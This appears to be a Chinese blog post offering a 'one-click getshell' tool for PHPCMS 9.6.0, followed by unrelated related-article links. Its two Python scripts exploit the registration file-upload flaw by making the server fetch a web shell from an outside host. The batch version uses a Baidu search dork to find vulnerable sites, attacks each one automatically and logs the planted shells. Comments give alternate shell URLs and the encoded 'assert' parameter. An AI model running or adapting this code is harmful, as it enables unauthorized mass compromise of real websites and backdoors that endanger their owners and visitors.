介绍

  • 一键化python 1.py http://xxx.com,如果是批量直接运行py文件即可

待办

  • [] 加入对有验证码phpcms网站的支持
  • [] 加入批量(已完成)

说明

依赖库的安装pip install requests

代码

# -*- coding:utf-8 -*-

'''

----------------------

Author : Akkuman

Blog   : hacktech.cn

----------------------

'''

import requests

import sys

from random import Random

chars = 'qwertyuiopasdfghjklzxcvbnm0123456789'

def main():

    if len(sys.argv) < 2:

        print("[*]Usage   : Python 1.py http://xxx.com")

        sys.exit()

    host = sys.argv[1]

    url = host + "/index.php?m=member&c=index&a=register&siteid=1"

    data = {

        "siteid": "1",

        "modelid": "1",

        "username": "dsakkfaffdssdudi",

        "password": "123456",

        "email": "dsakkfddsjdi@qq.com",

        # 如果想使用回调的可以使用http://file.codecat.one/oneword.txt,一句话地址为.php后面加上e=YXNzZXJ0

        "info[content]": "<img src=http://file.codecat.one/normalOneWord.txt?.php#.jpg>",

        "dosubmit": "1",

        "protocol": "",

    }

    try:

        rand_name = chars[Random().randint(0, len(chars) - 1)]

        data["username"] = "akkuman_%s" % rand_name

        data["email"] = "akkuman_%s@qq.com" % rand_name

        htmlContent = requests.post(url, data=data)

        successUrl = ""

        if "MySQL Error" in htmlContent.text and "http" in htmlContent.text:

            successUrl = htmlContent.text[htmlContent.text.index("http"):htmlContent.text.index(".php")] + ".php"

            print("[*]Shell  : %s" % successUrl)

        if successUrl == "":

            print("[x]Failed : had crawled all possible url, but i can't find out it. So it's failed.\n")

    except:

        print("Request Error")

if __name__ == '__main__':

    main()

批量

# -*- coding:utf-8 -*-

'''

----------------------

Author : Akkuman

Blog   : hacktech.cn

----------------------

'''

import requests

from bs4 import BeautifulSoup

# from urlparse import unquote //Python2

# from urlparse import urlparse //Python2

from urllib.parse import quote

from urllib.parse import urlparse

from random import Random

chars = 'qwertyuiopasdfghjklzxcvbnm0123456789'

headers = {

    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0"

}

def parseBaidu(keyword, pagenum):

    keywordsBaseURL = 'https://www.baidu.com/s?wd=' + str(quote(keyword)) + '&oq=' + str(quote(keyword)) + '&ie=utf-8' + '&pn='

    pnum = 0

    while pnum <= int(pagenum):

        baseURL = keywordsBaseURL + str(pnum*10)

        try:

            request = requests.get(baseURL, headers=headers)

            soup = BeautifulSoup(request.text, "html.parser")

            for a in soup.select('div.c-container > h3 > a'):

                url = requests.get(a['href'], headers=headers).url

                yield url

        except:

            yield None

        finally:

            pnum += 1

def saveShell(shellUrl):

    with open("webShell.txt","a+") as f:

        f.write("[*]%s\n" % shellUrl)

def main():

    data = {

        "siteid": "1",

        "modelid": "1",

        "username": "akkumandsad",

        "password": "123456",

        "email": "akkakkumafa@qq.com",

        # 如果想使用回调的可以使用http://file.codecat.one/oneword.txt,一句话地址为.php后面加上e=YXNzZXJ0,普通一句话http://file.codecat.one/normalOneWord.txt

        "info[content]": "<img src=http://7xusrl.com1.z0.glb.clouddn.com/bypassdog.txt?.php#.jpg>",

        "dosubmit": "1",

        "protocol": "",

    }

    for crawlUrl in parseBaidu("inurl:index.php?m=member&c=index&a=register&siteid=1", 10):

        try:

            if crawlUrl:

                rand_name = chars[Random().randint(0, len(chars) - 1)]

                data["username"] = "akkuman_%s" % rand_name

                data["email"] = "akkuman_%s@qq.com" % rand_name

                host = urlparse(crawlUrl).scheme + "://" + urlparse(crawlUrl).hostname

                url = host + "/index.php?m=member&c=index&a=register&siteid=1"

                htmlContent = requests.post(url, data=data, timeout=10)

                successUrl = ""

                if "MySQL Error" in htmlContent.text and "http" in htmlContent.text:

                    successUrl = htmlContent.text[htmlContent.text.index("http"):htmlContent.text.index(".php")] + ".php"

                    print("[*]Shell  : %s" % successUrl)

                    saveShell(successUrl)

                if successUrl == "":

                    print("[x]Failed : Failed to getshell.")

            else:

                continue

        except:

            print("Request Error")

if __name__ == '__main__':

    main()

测试图

单个

批量

下载地址

代码下载地址

phpcms9-6-0 一键getshell工具的更多相关文章

  1. PHPcms9.6.0任意文件上传漏洞直接getshell 利用教程

    对于PHPcms9.6.0 最新版漏洞,具体利用步骤如下: 首先我们在本地搭建一个php环境,我这里是appserv或者使用phpnow (官网下载地址:http://servkit.org/) (只 ...

  2. PHPCMS9.6.0最新版SQL注入和前台GETSHELL漏洞分析 (实验新课)

    PHPCMS9.6.0最新版中,由于/modules/attachment/attachments.php的过滤函数的缺陷导致了可以绕过它的过滤机制形成SQL注入漏洞,可导致数据库中数据泄漏. 而且在 ...

  3. 【6年开源路】海王星给你好看!FineUI v4.0正式版暨《FineUI3to4一键升级工具》发布!

    去年10-28号,我发布了一篇文章<海王星给你好看!FineUI v4.0公测版发布暨<你找BUG我送书>活动开始>,标志着FineUI开始向4.0版本迈进.经过4个月3个公测 ...

  4. MetInfo 5.1 自动化getshell工具

    title: MetInfo V5.1 GetShell一键化工具 date: 2016-06-08 22:40:32 categories: Hacker tags: - Hacker - Tool ...

  5. Win8.1、Office2013一键激活工具

    Win8.1.Office2013一键激活工具 KMSpico V7.0 是一款激活Win8.Windows8.1和Office2013的工具,由国外网友heldigard基于KMSEmulator制 ...

  6. 【渗透测试】PHPCMS9.6.0 任意文件上传漏洞+修复方案

    这个漏洞是某司的一位前辈发出来的,这里只是复现一下而已. 原文地址:https://www.t00ls.net/thread-39226-1-1.html 首先我们本地搭建一个phpcms9.6.0的 ...

  7. 看我是如何利用升级系统一键GetShell

    i春秋作家:小猪 原文来自:看我是如何利用升级系统一键GetShell 漏洞名称:看我是如何利用升级系统一键GetShell 程序下载地址:https://pan.baidu.com/s/1VdoPL ...

  8. Windows SharePoint Services 3.0编码开发工具和技巧(Part 1 of 2)

    转:http://blog.csdn.net/mattwin/article/details/2074984 WSSv3 Technical Articles_Windows SharePoint S ...

  9. WINDOWS下好用的MongoDB 3.0以上客户端工具: NoSql Manager

      WINDOWS下好用的MongoDB 3.0以上客户端工具: NoSql Manager https://www.mongodbmanager.com/download  

随机推荐

  1. Sitecore CMS中查看标准字段

    什么是标准字段? 标准字段是字段及其字段组的集合,用于包含有关Sitecore中项目的可配置元数据.Sitecore中继承自“标准模板”模板的任何项目都将包含这些字段. 可以在“标准模板”模板项找到/ ...

  2. uva 10163 Storage Keepers

    题意: 有n个仓库,m个人,一个仓库只能由一个人托管,每个人可以托管多个仓库. 每个人有一个能力值a,如果说他托管了k个仓库,那么这些仓库的安全值都是a/k. 雇佣一个人的花费也是a. 如果一个仓库没 ...

  3. python 简单了解namedtuple

    namedtuple类位于collections模块,有了namedtuple后通过属性访问数据能够让我们的代码更加的直观更好维护 namedtuple能够用来创建类似于元祖的数据类型,除了能够用索引 ...

  4. MyEclipse使用Ant打包项目

    本章主要介绍如何使用ant打包发布项目. ant 是一个将软件编译.测试.部署等步骤联系在一起加以自动化的一个工具,大多用于Java环境中的软件开发.在实际软件开发中,有很多地方可以用到ant. 优点 ...

  5. Twemproxy和Redis性能压力测试

    性能测试 Redis自带了一个叫 redis-benchmark的工具来模拟N个客户端同时发出M个请求,(类似于Apache ab程序),你可以使用redis-benchmark -h来查看基准参数. ...

  6. flask框架----上下文管理

    一.上下文管理相关知识点: a.类似于本地线程 创建Local类: { 线程或协程唯一标识: { 'stack':[request],'xxx':[session,] }, 线程或协程唯一标识: { ...

  7. Java中使用自定义类封装数组,添加类方法实现数据操作

    1.具体见注释 2.后续或有更新 public class MyArray { private long[] array; private int cnt; // 自定义数组类的元素个数 /** 使用 ...

  8. 使用准现网的数据,使用本地的样式脚本,本地调试准现网页面(PC适用)

    原理: 本地逻辑,重新渲染 步骤: 1.安装插件:Tampermonkey 度盘:https://pan.baidu.com/s/1bpBVVT9 2.设置: 点击插件-->仪表盘 添加脚本 将 ...

  9. 基于ARM Cortex-M0+ 的Bootloader 参考

    源: 基于ARM Cortex-M0+内核的bootloader程序升级原理及代码解析

  10. Kafka学习笔记之Kafka三款监控工具

    0x00 概述 在之前的博客中,介绍了Kafka Web Console这 个监控工具,在生产环境中使用,运行一段时间后,发现该工具会和Kafka生产者.消费者.ZooKeeper建立大量连接,从而导 ...